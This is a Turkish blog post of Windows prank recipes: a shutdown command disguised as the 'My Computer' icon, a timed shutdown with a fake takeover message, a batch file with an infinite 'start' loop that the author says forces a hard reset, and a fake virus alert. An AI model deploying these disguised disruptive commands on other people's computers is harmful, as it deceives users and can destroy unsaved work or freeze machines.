Subscribe:

15 Aralık 2013 Pazar

Windows Komutlarıyla Şaka Yapma Yöntemleri

1-Bilgisayarı Kapatma veya Yeniden Başlatma
Masaüstünde yeni bir kısayol oluşturun. Karşınıza çıkan sihirbazda konum alanına  “shutdown /s /t 0″  yazın. Kısayol için bir isim girin. Bu sık kullanılan bir isim olmalı. "Bilgisayarım" mesela. Sonra girdiğiniz isim ile ilgili kısayola bir simge atamak için kısayola sağ tıklayıp özellikleri açalım. Simge değiştir bölümünden dilediğiniz simgeyi seçebilirsiniz.
Kullanıcı o simgeye tıkladığında bilgisayar kapanacaktır. (Bu oldukça kötü bir şaka olabilir :) Şakazedenin kaydedilmemiş bilgileri olabilir. Sorumluluk tamamen size ait.)

Yeniden başlatmak için ise sihirbazdaki konum alanına "Shutdown.exe -r -t 00" yazmanız gerekiyor.
2-Uykuya Alma
Yöntem 1. yöntemle aynı. Sadece kısayol oluştururken sihirbazdaki konum alanına "rundll32.exe powrprof.dll,SetSuspendState 0,1,0" yazmanız gerekiyor.

3-Kısayol oluşturun. Öğrenin konumuna "shutdown -s -t 600" yazınız. (Burada kaç saniyede kapanmasını istiyorsak o kadarlık sayı giriyoruz.) Sonra -c yazıp oraya herahangi bir metin yazabilirsiniz.
shutdown -s -t 600 -c "Bilgisayarınız Sadık tarafından ele geçirilmiştir :)"

4-Not defterini açalım ve sonra aşağıdaki metni kopyalayıp yapıştıralım

color 0a

cd ..

cd ..

dir /s


ardından Dosya>Farklı Kaydet diyerek dosyanızınismi.bat şeklinde kaydedelim. Birisi bu kaydedilen dosyaya tıkladığında cmd ekranı açılacak ve kayan yazılar olacaktır. Tıklayan kişi korkuya kapılabilir. :)



5-Notpad'i açınız. Yazbildiğiniz kadar alt alta start yazınız. ondan sonra kaydederken dosyaismi.bad diye kaydediniz. Etkisi siyah ekranlar açar.(Siyah ekran dediğim çalıştıra cmd yazınca çıkan ekrandan bahsediyorum :)) Kaç tane start yazarsan o kadar siyah ekran çıkar. Fakat bu olayın daha fena hali var.

:hop 
start
goto hop

bu 3 satırı yazdığınızda bilgisayarı döngüye sokmuş oluyorsunuz. Tek çare reset atmak :)

6-Klasör oluşturma şakası
md virus1
md virus2
md virus3
md virus4
md virus5
@echo off
@echo Çok Tehlikeli Bir Dosya Çalıştırdınız...
@echo Ve Bilgisayara Virüs Bulaştırdınız...
@echo "Esc" Tuşuna Basarak Çıkış Yapmazsanız Bilgisayarınız Çökecektir...
Pause>nul
start
start
start
start
start

yine not defterini açıp yukarıdaki kodları yapıştırıyoruz. Sonra tıkla.bat diyerek kaydediyoruz. Yukarıdaki kodlara bakarsak md klasör oluşturma komutudur. Masaüstünüzde 5 tane klasör oluşturur.(Dilerseniz 100 tane md virüs100'e kadar yapabilirsiniz :)) ESC tuşuna bastığınızda ise start komutu kadar cmd ekranı açılacaktır. Kodlar zararsızdır. Sadece masaüstünüzde bayağı boş bir klasör oluşturur. Klasörleri tek tek silmek için uğraşmak istemiyorsanız "md"leri "rd" yapıp @echo off yazan yerden  aşağıyı silip tekrar çalıştırabilirsiniz.

7-CD-Rom Şakası
Buradan ilgili bağlantıya ulaşabilirsiniz :)


5 yorum: